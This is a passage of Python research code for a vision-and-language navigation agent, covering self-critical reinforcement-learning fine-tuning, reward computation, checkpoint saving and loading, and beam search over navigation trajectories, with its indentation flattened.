# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'],
ob['heading'], ob['elevation']))
if seqLogprobs is not None: # feedback == 'sample1'
seqLogprobs[:, t] = sampleLogprobs.view(-1)
# Early exit if all ended
if ended.all(): break
path_res = {}
for t in traj:
path_res[t['instr_id']] = t['path']
return traj, mask, seqLogprobs, path_res
def rl_train(self, train_Eval, encoder_optimizer, decoder_optimizer,
n_iters, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale):
''' jolin: self-critical finetuning'''
self.losses = []
epo_inc = 0
self.encoder.train()
self.decoder.train()
for iter in range(1, n_iters + 1): # n_iters=interval
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
# copy from self.rollout():
# one minibatch (100 instructions)
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
epo_inc += self.env.epo_inc
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
gen_traj, mask, seqLogprobs, gen_results = self.rl_rollout(obs, perm_obs, seq, seq_mask,
seq_lengths, perm_idx, 'sample1',
self.encoder, self.decoder)
# jolin: get greedy decoding baseline
# Just like self.test(use_dropout=False, feedback='argmax').
# But we should not do env.reset_epoch(), because we do not
# test the whole split. So DON'T reuse test()!
world_states = self.env.reset_batch()
obs = np.array(self.env._get_obs(world_states))# for later 'sample' feedback batch
perm_obs = obs[perm_idx]
if self.monotonic:
encoder2, decoder2 = self.encoder2, self.decoder2
else:
self.encoder.eval()
self.decoder.eval()
encoder2, decoder2 = self.encoder, self.decoder
with torch.no_grad():
greedy_traj, _, _, greedy_res = self.rl_rollout(obs, perm_obs, seq, seq_mask,
seq_lengths, perm_idx, 'argmax1',
encoder2, decoder2)
if not self.monotonic:
self.encoder.train()
self.decoder.train()
# jolin: get self-critical reward
reward = self.get_self_critical_reward(gen_traj, train_Eval, gen_results, greedy_res, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale)
# jolin: RewardCriterion
self.loss = self.PG_reward_criterion(seqLogprobs, reward, mask)
self.losses.append(self.loss.item())
self.loss.backward()
#clip_gradient(encoder_optimizer)
#clip_gradient(decoder_optimizer)
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
return epo_inc
def PG_reward_criterion(self, seqLogprobs, reward, mask):
# jolin: RewardCriterion
input = to_contiguous(seqLogprobs).view(-1)
reward = to_contiguous(torch.from_numpy(reward).float().to(device)).view(-1)
#mask = to_contiguous(torch.cat([mask.new(mask.size(0), 1).fill_(1), mask[:, :-1]], 1)).view(-1)
mask = to_contiguous(torch.from_numpy(mask).float().to(device)).view(-1)
output = - input * reward * mask
loss = torch.sum(output) / torch.sum(mask)
return loss
def get_self_critical_reward(self, traj, Eval, gen_results, greedy_res, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale):
# get self-critical reward
instr_id_order = [t['instr_id'] for t in traj]
gen_scores = Eval.score_batch(gen_results, instr_id_order)
greedy_scores = Eval.score_batch(greedy_res, instr_id_order)
# normal score
gen_hits = (np.array(gen_scores['nav_errors']) <= 3.0).astype(float)
greedy_hits = (np.array(greedy_scores['nav_errors']) <= 3.0).astype(float)
gen_lengths = (np.array(gen_scores['trajectory_lengths'])).astype(float)
# sr_sc
hits = gen_hits - greedy_hits
#reward = np.repeat(hits[:, np.newaxis], self.episode_len, 1)*sc_reward_scale
# spl
gen_spls = (np.array(gen_scores['spl'])).astype(float)
greedy_spls = (np.array(greedy_scores['spl'])).astype(float)
ave_steps = (np.array(gen_scores['trajectory_steps'])).sum()/float(len(instr_id_order))
steps = (np.array(gen_scores['trajectory_steps']) - self.episode_len).sum()
if self.reward_func == 'sr_sc':
reward = np.repeat(hits[:, np.newaxis], self.episode_len, 1)*sc_reward_scale
elif self.reward_func == 'spl':
reward = np.repeat(gen_spls[:, np.newaxis], self.episode_len, 1) * sc_reward_scale
elif self.reward_func == 'spl_sc':
# spl_sc
spl_sc = gen_spls - greedy_spls
reward = np.repeat(spl_sc[:, np.newaxis], self.episode_len, 1) * sc_reward_scale
elif self.reward_func == 'spl_last': # does not work
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.zeros((gen_spls.shape[0], self.episode_len), dtype=float)
reward[range(gen_spls.shape[0]), tj_steps] = gen_scores['spl']
elif self.reward_func == 'spl_last_sc':
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.zeros((gen_spls.shape[0], self.episode_len), dtype=float)
reward[range(gen_spls.shape[0]), tj_steps] = [x - y for x, y in zip(gen_scores['spl'], greedy_scores['spl'])]
elif self.reward_func == 'spl_psc': # test
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.full((gen_spls.shape[0], self.episode_len), -sc_length_scale, dtype=float) # penalty
reward[range(gen_spls.shape[0]), tj_steps] = gen_scores['spl']
# discounted immediate reward
if sc_discouted_immediate_r_scale>0:
discounted_r = discount_rewards(gen_scores['immediate_rewards'], self.episode_len) * sc_discouted_immediate_r_scale
reward = reward + discounted_r
# panelty for length
if sc_length_scale:
length_panelty = np.repeat(gen_lengths[:, np.newaxis], self.episode_len, 1)*sc_length_scale
reward = reward - length_panelty
return reward
def save(self, encoder_path, decoder_path):
''' Snapshot models '''
write_num = 0
while (write_num < 10):
try:
torch.save(self.encoder.state_dict(), encoder_path)
torch.save(self.decoder.state_dict(), decoder_path)
if torch.cuda.is_available():
torch.save(torch.cuda.random.get_rng_state(), decoder_path + '.rng.gpu')
torch.save(torch.random.get_rng_state(), decoder_path + '.rng')
with open(decoder_path + '.rng2', 'wb') as f:
pickle.dump(random.getstate(), f)
break
except:
write_num += 1
def delete(self, encoder_path, decoder_path):
''' Delete models '''
os.remove(encoder_path)
os.remove(decoder_path)
os.remove(decoder_path+'.rng.gpu')
os.remove(decoder_path+'.rng')
os.remove(decoder_path+'.rng2')
def load(self, encoder_path, decoder_path):
''' Loads parameters (but not training state) '''
self.encoder.load_state_dict(torch.load(encoder_path, 'cuda:0' if torch.cuda.is_available() else 'cpu'))
self.decoder.load_state_dict(torch.load(decoder_path, 'cuda:0' if torch.cuda.is_available() else 'cpu'), strict=False)
self.encoder.to(device)
self.decoder.to(device)
if self.monotonic:
self.copy_seq2seq()
try:
with open(decoder_path+'.rng2','rb') as f:
random.setstate(pickle.load(f))
torch.random.set_rng_state(torch.load(decoder_path + '.rng'))
torch.cuda.random.set_rng_state(torch.load(decoder_path + '.rng.gpu'))
except FileNotFoundError:
print('Warning: failed to find random seed file')
def copy_seq2seq(self):
self.encoder2=copy.deepcopy(self.encoder)
self.decoder2=copy.deepcopy(self.decoder)
self.encoder2.eval()
self.decoder2.eval()
for param in self.encoder2.parameters():
param.requires_grad = False
for param in self.decoder2.parameters():
param.requires_grad = False
class PretrainVLAgent(BaseAgent):
''' An agent based on an LSTM seq2seq model with attention. '''
model_actions, env_actions = basic_actions()
feedback_options = ['teacher', 'argmax', 'sample']
def __init__(self, env, results_path, encoder, decoder, seed, aux_ratio, decoder_init,
params=None, monotonic=False, episode_len=20, state_factored=False): # , subgoal
super(Seq2SeqAgent, self).__init__(env, results_path, seed=seed)
self.encoder, self.decoder = encoder, decoder # encoder2 is only for self_critic
self.encoder2, self.decoder2 = None, None
self.monotonic = monotonic
if self.monotonic:
self.copy_seq2seq()
self.episode_len = episode_len
self.losses = []
self.losses_ctrl_f = [] # For learning auxiliary tasks
self.aux_ratio = aux_ratio
self.decoder_init = decoder_init
self.clip_gradient = params['clip_gradient']
self.clip_gradient_norm = params['clip_gradient_norm']
self.reward_func = params['reward_func']
self.schedule_ratio = params['schedule_ratio']
self.temp_alpha = params['temp_alpha']
self.testing_settingA = params['test_A']
if self.decoder.action_space == 6:
self.ignore_index = self.model_actions.index('<ignore>')
else:
self.ignore_index = -1
self.criterion = nn.CrossEntropyLoss(ignore_index=self.ignore_index)
if self.decoder.ctrl_feature:
assert self.decoder.action_space == -1 # currently only implement this
self.criterion_ctrl_f = nn.MSELoss() # todo: MSE or ?
self.state_factored = state_factored
@staticmethod
def n_inputs():
return len(Seq2SeqAgent.model_actions)
@staticmethod
def n_outputs():
return len(Seq2SeqAgent.model_actions)-2 # Model doesn't output start or ignore
def _sort_batch(self, obs):
sorted_tensor, mask, seq_lengths, perm_idx = sort_batch(obs)
if isinstance(sorted_tensor, list):
sorted_tensors, masks, seqs_lengths = [], [], []
for i in range(len(sorted_tensor)):
sorted_tensors.append(Variable(sorted_tensor[i], requires_grad=False).long().to(device))
masks.append(mask[i].byte().to(device))
seqs_lengths.append(seq_lengths[i])
return sorted_tensors, masks, seqs_lengths, perm_idx
return Variable(sorted_tensor, requires_grad=False).long().to(device), \
mask.byte().to(device), \
list(seq_lengths), list(perm_idx)
def _feature_variable(self, obs):
''' Extract precomputed features into variable. '''
#feature_size = obs[0]['feature'].shape[0]
#features = np.empty((len(obs),feature_size), dtype=np.float32)
if isinstance(obs[0]['feature'],tuple): # todo?
features_pano = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'][0], dtype=np.float32), 0), len(obs), axis=0) # jolin
features = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'][1], dtype=np.float32), 0), len(obs), axis=0) # jolin
for i,ob in enumerate(obs):
features_pano[i] = ob['feature'][0]
features[i] = ob['feature'][1]
return (Variable(torch.from_numpy(features_pano), requires_grad=False).to(device),
Variable(torch.from_numpy(features), requires_grad=False).to(device))
else:
features = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'], dtype=np.float32),0),len(obs),axis=0) # jolin
for i,ob in enumerate(obs):
features[i] = ob['feature']
return Variable(torch.from_numpy(features), requires_grad=False).to(device)
def get_next(self, feedback, target, logit):
if feedback == 'teacher':
a_t = target # teacher forcing
elif feedback == 'argmax':
_, a_t = logit.max(1) # student forcing - argmax
a_t = a_t.detach()
elif feedback == 'sample':
probs = F.softmax(logit, dim=1)
m = D.Categorical(probs)
a_t = m.sample() # sampling an action from model
else:
sys.exit('Invalid feedback option')
return a_t
def _action_variable(self, obs):
# get the maximum number of actions of all sample in this batch
max_num_a = -1
for i, ob in enumerate(obs):
max_num_a = max(max_num_a, len(ob['adj_loc_list']))
is_valid = np.zeros((len(obs), max_num_a), np.float32)
action_embedding_dim = obs[0]['action_embedding'].shape[-1]
action_embeddings = np.zeros((len(obs), max_num_a, action_embedding_dim), dtype=np.float32)
for i, ob in enumerate(obs):
adj_loc_list = ob['adj_loc_list']
num_a = len(adj_loc_list)
is_valid[i, 0:num_a] = 1.
action_embeddings[i, :num_a, :] = ob['action_embedding'] #bug: todo
#for n_a, adj_dict in enumerate(adj_loc_list):
# action_embeddings[i, :num_a, :] = ob['action_embedding']
return (Variable(torch.from_numpy(action_embeddings), requires_grad=False).to(device),
Variable(torch.from_numpy(is_valid), requires_grad=False).to(device),
is_valid)
def _teacher_action_variable(self, obs):
# get the maximum number of actions of all sample in this batch
action_embedding_dim = obs[0]['action_embedding'].shape[-1]
action_embeddings = np.zeros((len(obs), action_embedding_dim), dtype=np.float32)
for i, ob in enumerate(obs):
adj_loc_list = ob['adj_loc_list']
action_embeddings[i, :] = ob['action_embedding'][ob['teacher']] #bug: todo
#for n_a, adj_dict in enumerate(adj_loc_list):
# action_embeddings[i, :num_a, :] = ob['action_embedding']
return Variable(torch.from_numpy(action_embeddings), requires_grad=False).to(device)
def _teacher_action(self, obs, ended):
a = teacher_action(self.model_actions, self.decoder.action_space, obs, ended, self.ignore_index)
return Variable(a, requires_grad=False).to(device)
def _teacher_feature(self, obs, ended):#, max_num_a):
''' Extract teacher look ahead auxiliary features into variable. '''
# todo: 6 action space
ctrl_features_dim = -1
for i, ob in enumerate(obs): # todo: whether include <stop> ?
# max_num_a = max(max_num_a, len(ob['ctrl_features']))
if ctrl_features_dim<0 and len(ob['ctrl_features']):
ctrl_features_dim = ob['ctrl_features'].shape[-1] #[0].shape[-1]
break
#is_valid no need to create. already created
ctrl_features_tensor = np.zeros((len(obs), ctrl_features_dim), dtype=np.float32)
for i, ob in enumerate(obs):
if not ended[i]:
ctrl_features_tensor[i, :] = ob['ctrl_features']
return Variable(torch.from_numpy(ctrl_features_tensor), requires_grad=False).to(device)
def rollout(self, beam_size=1, successors=1):
if beam_size ==1 and not debug_beam:
if self.encoder.__class__.__name__ == 'BertImgEncoder':
return self.pretrain_rollout_with_loss()
else:
return self.rollout_with_loss()
# beam
with torch.no_grad():
if self.state_factored:
beams = self.state_factored_search(beam_size, successors, first_n_ws_key=4)
else:
beams = self.beam_search(beam_size)
return beams
def state_factored_search(self, completion_size, successor_size, first_n_ws_key=4):
assert self.decoder.panoramic
world_states = self.env.reset(sort=True)
initial_obs = (self.env._get_obs(world_states))
batch_size = len(world_states)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch([o for ob in initial_obs for o in ob])
world_states = [[world_state for f, world_state in states] for states in world_states]
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
completed = []
completed_holding = []
for _ in range(batch_size):
completed.append({})
completed_holding.append({})
state_cache = [
{ws[0][0:first_n_ws_key]: (InferenceState(prev_inference_state=None,
world_state=ws[0],
observation=o[0],
flat_index=None,
last_action=-1,
last_action_embedding=self.decoder.u_begin,
action_count=0,
score=0.0, h_t=h_t[i], c_t=c_t[i], last_alpha=None), True)}
for i, (ws, o) in enumerate(zip(world_states, initial_obs))
]
beams = [[inf_state for world_state, (inf_state, expanded) in sorted(instance_cache.items())]
for instance_cache in state_cache] # sorting is a noop here since each instance_cache should only contain one
last_expanded_list = []
traversed_lists = []
for beam in beams:
assert len(beam)==1
first_state = beam[0]
last_expanded_list.append(first_state)
traversed_lists.append([first_state])
def update_traversed_lists(new_visited_inf_states):
assert len(new_visited_inf_states) == len(last_expanded_list)
assert len(new_visited_inf_states) == len(traversed_lists)
for instance_index, instance_states in enumerate(new_visited_inf_states):
last_expanded = last_expanded_list[instance_index]
# todo: if this passes, shouldn't need traversed_lists
assert last_expanded.world_state.viewpointId == traversed_lists[instance_index][-1].world_state.viewpointId
for inf_state in instance_states:
path_from_last_to_next = least_common_viewpoint_path(last_expanded, inf_state)
# path_from_last should include last_expanded's world state as the first element, so check and drop that
assert path_from_last_to_next[0].world_state.viewpointId == last_expanded.world_state.viewpointId
assert path_from_last_to_next[-1].world_state.viewpointId == inf_state.world_state.viewpointId
traversed_lists[instance_index].extend(path_from_last_to_next[1:])
last_expanded = inf_state
last_expanded_list[instance_index] = last_expanded
# Do a sequence rollout and calculate the loss
while any(len(comp) < completion_size for comp in completed):
beam_indices = []
u_t_list = []
h_t_list = []
c_t_list = []
flat_obs = []
for beam_index, beam in enumerate(beams):
for inf_state in beam:
beam_indices.append(beam_index)
u_t_list.append(inf_state.last_action_embedding)
h_t_list.append(inf_state.h_t.unsqueeze(0))
c_t_list.append(inf_state.c_t.unsqueeze(0))
flat_obs.append(inf_state.observation)
u_t_prev = torch.stack(u_t_list, dim=0)
assert len(u_t_prev.shape) == 2
# Image features from obs
# if self.decoder.panoramic:
f_t_all, f_t = self._feature_variable(flat_obs)
# Action feature from obs
# if self.decoder.action_space == 6:
# u_t_features, is_valid = np.zeros((batch_size, 1)), None
# else:
u_t_features, is_valid, is_valid_numpy = self._action_variable(flat_obs)
h_t = torch.cat(h_t_list, dim=0)
c_t = torch.cat(c_t_list, dim=0)
h_t, c_t, alpha, logit, pred_f = self.decoder(None, u_t_prev, u_t_features, f_t,
f_t_all, h_t, c_t, [ctx_si[beam_indices] for ctx_si in ctx] if isinstance(ctx, list) else ctx[beam_indices],
[seq_mask_si[beam_indices] for seq_mask_si in seq_mask] if isinstance(ctx, list) else seq_mask[beam_indices])
# Mask outputs of invalid actions
logit[is_valid == 0] = -float('inf')
# # Mask outputs where agent can't move forward
# no_forward_mask = [len(ob['navigableLocations']) <= 1 for ob in flat_obs]
masked_logit = logit
log_probs = F.log_softmax(logit, dim=1).data
# force ending if we've reached the max time steps
# if t == self.episode_len - 1:
# action_scores = log_probs[:,self.end_index].unsqueeze(-1)
# action_indices = torch.from_numpy(np.full((log_probs.size()[0], 1), self.end_index))
# else:
#_, action_indices = masked_logit.data.topk(min(successor_size, logit.size()[1]), dim=1)
_, action_indices = masked_logit.data.topk(logit.size()[1], dim=1) # todo: fix this
action_scores = log_probs.gather(1, action_indices)
assert action_scores.size() == action_indices.size()
start_index = 0
assert len(beams) == len(world_states)
all_successors = []
for beam_index, (beam, beam_world_states) in enumerate(zip(beams, world_states)):
successors = []
end_index = start_index + len(beam)
assert len(beam_world_states) == len(beam)
if beam:
for inf_index, (inf_state, world_state, action_score_row) in \
enumerate(zip(beam, beam_world_states, log_probs[start_index:end_index])):
flat_index = start_index + inf_index
for action_index, action_score in enumerate(action_score_row):
if is_valid_numpy[flat_index, action_index] == 0:
continue
successors.append(
InferenceState(prev_inference_state=inf_state, world_state=world_state,
observation=flat_obs[flat_index],
flat_index=None,
last_action=action_index,
last_action_embedding=u_t_features[flat_index, action_index].detach(),
action_count=inf_state.action_count + 1,
score=float(inf_state.score + action_score),
h_t=h_t[flat_index], c_t=c_t[flat_index],
last_alpha=[alpha_si[flat_index].data for alpha_si in alpha] if isinstance(alpha, list) else alpha[flat_index].data)
)
start_index = end_index
successors = sorted(successors, key=lambda t: t.score, reverse=True)
all_successors.append(successors)
successor_world_states = [
[inf_state.world_state for inf_state in successors]
for successors in all_successors
]
successor_env_actions = [
[inf_state.last_action for inf_state in successors]
for successors in all_successors
]
successor_last_obs = [
[inf_state.observation for inf_state in successors]
for successors in all_successors
]
successor_world_states = self.env.step(successor_env_actions, successor_last_obs, successor_world_states)
successor_world_states = [[world_state for f, world_state in states] for states in successor_world_states]
acc = []
for ttt in zip(all_successors, successor_world_states):
mapped = [inf._replace(world_state=ws) for inf, ws in zip(*ttt)]
acc.append(mapped)
all_successors = acc
assert len(all_successors) == len(state_cache)
new_beams = []
for beam_index, (successors, instance_cache) in enumerate(zip(all_successors, state_cache)):
# early stop if we've already built a sizable completion list
instance_completed = completed[beam_index]
instance_completed_holding = completed_holding[beam_index]
if len(instance_completed) >= completion_size:
new_beams.append([])
continue
for successor in successors:
ws_keys = successor.world_state[0:first_n_ws_key]
if successor.last_action == 0 or successor.action_count == self.episode_len:
if ws_keys not in instance_completed_holding or instance_completed_holding[ws_keys][
0].score < successor.score:
instance_completed_holding[ws_keys] = (successor, False)
else:
if ws_keys not in instance_cache or instance_cache[ws_keys][0].score < successor.score:
instance_cache[ws_keys] = (successor, False)
# third value: did this come from completed_holding?
uncompleted_to_consider = ((ws_keys, inf_state, False) for (ws_keys, (inf_state, expanded)) in
instance_cache.items() if not expanded)
completed_to_consider = ((ws_keys, inf_state, True) for (ws_keys, (inf_state, expanded)) in
instance_completed_holding.items() if not expanded)
import itertools
import heapq
to_consider = itertools.chain(uncompleted_to_consider, completed_to_consider)
ws_keys_and_inf_states = heapq.nlargest(successor_size, to_consider, key=lambda pair: pair[1].score)
new_beam = []
for ws_keys, inf_state, is_completed in ws_keys_and_inf_states:
if is_completed:
assert instance_completed_holding[ws_keys] == (inf_state, False)
instance_completed_holding[ws_keys] = (inf_state, True)
if ws_keys not in instance_completed or instance_completed[ws_keys].score < inf_state.score:
instance_completed[ws_keys] = inf_state
else:
instance_cache[ws_keys] = (inf_state, True)
new_beam.append(inf_state)
if len(instance_completed) >= completion_size:
new_beams.append([])
else:
new_beams.append(new_beam)
beams = new_beams
# Early exit if all ended
if not any(beam for beam in beams):
break
world_states = [
[inf_state.world_state for inf_state in beam]
for beam in beams
]
successor_obs = np.array(self.env._get_obs(self.env.world_states2feature_states(world_states)))
acc = []
for tttt in zip(beams, successor_obs):
mapped = [inf._replace(observation=o) for inf, o in zip(*tttt)]
acc.append(mapped)
beams = acc
update_traversed_lists(beams)
completed_list = []
for this_completed in completed:
completed_list.append(sorted(this_completed.values(), key=lambda t: t.score, reverse=True)[:completion_size])
completed_ws = [
[inf_state.world_state for inf_state in comp_l]
for comp_l in completed_list
]
completed_obs = np.array(self.env._get_obs(self.env.world_states2feature_states(completed_ws)))
accu = []
for ttttt in zip(completed_list, completed_obs):
mapped = [inf._replace(observation=o) for inf, o in zip(*ttttt)]
accu.append(mapped)
completed_list = accu
update_traversed_lists(completed_list)
trajs = []
for this_completed in completed_list:
assert this_completed
this_trajs = []
for inf_state in this_completed:
path_states, path_observations, path_actions, path_scores, path_attentions = backchain_inference_states(inf_state)
# this will have messed-up headings for (at least some) starting locations because of
# discretization, so read from the observations instead
## path = [(obs.viewpointId, state.heading, state.elevation)
## for state in path_states]
trajectory = [path_element_from_observation(ob) for ob in path_observations]
this_trajs.append({
'instr_id': path_observations[0]['instr_id'],
'instr_encoding': path_observations[0]['instr_encoding'],
'path': trajectory,
'observations': path_observations,
'actions': path_actions,
'score': inf_state.score,
'scores': path_scores,
'attentions': path_attentions
})
trajs.append(this_trajs)
return trajs, completed_list, traversed_lists
def beam_search(self, beam_size):
assert self.decoder.panoramic
# assert self.env.beam_size >= beam_size
world_states = self.env.reset(True) # [(feature, state)]
obs = np.array(self.env._get_obs(world_states))
batch_size = len(world_states)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch([o for ob in obs for o in ob])
world_states = [[world_state for f, world_state in states] for states in world_states]
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
completed = []
for _ in range(batch_size):
completed.append([])
beams = [[InferenceState(prev_inference_state=None,
world_state=ws[0],
observation=o[0],
flat_index=i,
last_action=-1,
last_action_embedding=self.decoder.u_begin,
action_count=0,
score=0.0,
h_t=None, c_t=None,
last_alpha=None)]
for i, (ws, o) in enumerate(zip(world_states, obs))]
#
# batch_size x beam_size
for t in range(self.episode_len):
flat_indices = []
beam_indices = []
u_t_list = []
for beam_index, beam in enumerate(beams):
for inf_state in beam:
beam_indices.append(beam_index)
flat_indices.append(inf_state.flat_index)
u_t_list.append(inf_state.last_action_embedding)
u_t_prev = torch.stack(u_t_list, dim=0)
flat_obs = [ob for obs_beam in obs for ob in obs_beam]
# Image features from obs
# if self.decoder.panoramic:
f_t_all, f_t = self._feature_variable(flat_obs)
# Action feature from obs
# if self.decoder.action_space == 6:
# u_t_features, is_valid = np.zeros((batch_size, 1)), None
# else:
u_t_features, is_valid, is_valid_numpy = self._action_variable(flat_obs)
h_t, c_t, alpha, logit, pred_f = self.decoder(None, u_t_prev, u_t_features,
f_t, f_t_all, h_t[flat_indices], c_t[flat_indices],
[ctx_si[beam_indices] for ctx_si in ctx] if isinstance(ctx, list) else ctx[beam_indices],
[seq_mask_si[beam_indices] for seq_mask_si in seq_mask] if isinstance(ctx, list) else seq_mask[beam_indices])
# Mask outputs where agent can't move forward
logit[is_valid == 0] = -float('inf')
masked_logit = logit # for debug
log_probs = F.log_softmax(logit, dim=1).data
_, action_indices = masked_logit.data.topk(min(beam_size, logit.size()[1]), dim=1)
action_scores = log_probs.gather(1, action_indices)
assert action_scores.size() == action_indices.size()
start_index = 0
new_beams = []
assert len(beams) == len(world_states)
all_successors = []
for beam_index, (beam, beam_world_states, beam_obs) in enumerate(zip(beams, world_states, obs)):
successors = []
end_index = start_index + len(beam)
assert len(beam_obs) == len(beam) and len(beam_world_states) == len(beam)
if beam:
for inf_index, (inf_state, world_state, ob, action_score_row, action_index_row) in \
enumerate(zip(beam, beam_world_states, beam_obs, action_scores[start_index:end_index],
action_indices[start_index:end_index])):
flat_index = start_index + inf_index
for action_score, action_index in zip(action_score_row, action_index_row):
if is_valid_numpy[flat_index, action_index] == 0:
continue
successors.append(
InferenceState(prev_inference_state=inf_state,
world_state=world_state,
# will be updated later after successors are pruned
observation=ob, # will be updated later after successors are pruned
flat_index=flat_index,
last_action=action_index,
last_action_embedding=u_t_features[flat_index, action_index].detach(),
action_count=inf_state.action_count + 1,
score=float(inf_state.score + action_score), h_t=None, c_t=None,
last_alpha=[alpha_si[flat_index].data for alpha_si in alpha] if isinstance(alpha, list) else alpha[flat_index].data)
)
start_index = end_index
successors = sorted(successors, key=lambda t: t.score, reverse=True)[:beam_size]
all_successors.append(successors)
successor_world_states = [
[inf_state.world_state for inf_state in successors]
for successors in all_successors
]
successor_env_actions = [
[inf_state.last_action for inf_state in successors]
for successors in all_successors
]
successor_last_obs = [
[inf_state.observation for inf_state in successors]
for successors in all_successors
]
successor_world_states=self.env.step(successor_env_actions, successor_last_obs, successor_world_states)
successor_obs = np.array(self.env._get_obs(successor_world_states))
successor_world_states = [[world_state for f, world_state in states] for states in successor_world_states]
acc = []
for ttt in zip(all_successors, successor_world_states, successor_obs):
mapped = [inf._replace(world_state=ws, observation=o) for inf, ws, o in zip(*ttt)]
acc.append(mapped)
all_successors=acc
for beam_index, successors in enumerate(all_successors):
new_beam = []
for successor in successors:
if successor.last_action == 0 or t == self.episode_len - 1:
completed[beam_index].append(successor)
else:
new_beam.append(successor)
if len(completed[beam_index]) >= beam_size:
new_beam = []
new_beams.append(new_beam)
beams = new_beams
world_states = [
[inf_state.world_state for inf_state in beam]
for beam in beams
]
obs = [
[inf_state.observation for inf_state in beam]
for beam in beams
]
# Early exit if all ended
if not any(beam for beam in beams):
break
trajs = []
for this_completed in completed:
assert this_completed
this_trajs = []
for inf_state in sorted(this_completed, key=lambda t: t.score, reverse=True)[:beam_size]:
path_states, path_observations, path_actions, path_scores, path_attentions = backchain_inference_states(inf_state)
# this will have messed-up headings for (at least some) starting locations because of
# discretization, so read from the observations instead
## path = [(obs.viewpointId, state.heading, state.elevation)
## for state in path_states]
trajectory = [path_element_from_observation(ob) for ob in path_observations]
this_trajs.append({
'instr_id': path_observations[0]['instr_id'],
'instr_encoding': path_observations[0]['instr_encoding'],
'path': trajectory,
'observations': path_observations,
'actions': path_actions,
'score': inf_state.score,
'scores': path_scores,
'attentions': path_attentions
})
trajs.append(this_trajs)
traversed_lists = None # todo
return trajs, completed, traversed_lists
def rollout_with_loss(self):
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
batch_size = len(obs)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
# when there are multiple sentences, perm_idx will simply be range(batch_size).
# but perm_idx for each batch of i-th(i=1 or 2 or 3) will be inside seq_length.
# this means:
# seq_lengths=[(seq_lengths,perm_idx),(seq_lengths,perm_idx),(seq_lengths,perm_idx)]
# Record starting point
traj = [{'instr_id': ob['instr_id'], 'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]} for ob in perm_obs]
# Forward through encoder, giving initial hidden state and memory cell for decoder
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
#h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
c_t = torch.zeros_like(c_t) # debug
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if self.decoder.action_space == -1:
u_t_prev = self.decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() * self.model_actions.index('<start>'), requires_grad=False).to(device)
ended = np.array([False] * batch_size) # Indices match permuation of the model, not env
# Do a sequence rollout and calculate the loss
self.loss = 0
self.loss_ctrl_f = 0
env_action = [None] * batch_size
# for plot
#all_alpha = []
action_scores = np.zeros((batch_size,))
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if self.decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if self.decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Supervised training
target = self._teacher_action(perm_obs, ended)
h_t, c_t, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, h_t, c_t, ctx, seq_mask)
# all_alpha.append(alpha)
# Mask outputs where agent can't move forward
if self.decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else:
logit[is_valid == 0] = -float('inf')
# if self.decoder.ctrl_feature:
# pred_f[is_valid == 0] = 0
if self.temp_alpha != 0: # add temperature
logit = logit/self.temp_alpha
self.loss += self.criterion(logit, target)
# Auxiliary training
if self.decoder.ctrl_feature:
target_f = self._teacher_feature(perm_obs, ended)#, is_valid.shape[-1])
self.loss_ctrl_f += self.aux_ratio * self.criterion_ctrl_f(pred_f, target_f)
# todo: add auxiliary tasks to sc-rl training?
# Determine next model inputs
# scheduled sampling
if self.schedule_ratio >= 0 and self.schedule_ratio <= 1:
sample_feedback = random.choices(['sample', 'teacher'], [self.schedule_ratio, 1 - self.schedule_ratio], k=1)[0] # schedule sampling
if self.feedback != 'argmax': # ignore test case
self.feedback = sample_feedback
a_t = self.get_next(self.feedback, target, logit)
# setting A
if self.testing_settingA:
log_probs = F.log_softmax(logit, dim=1).data
action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
# log_probs = F.log_softmax(logit, dim=1).data
# action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
a_t_prev = a_t
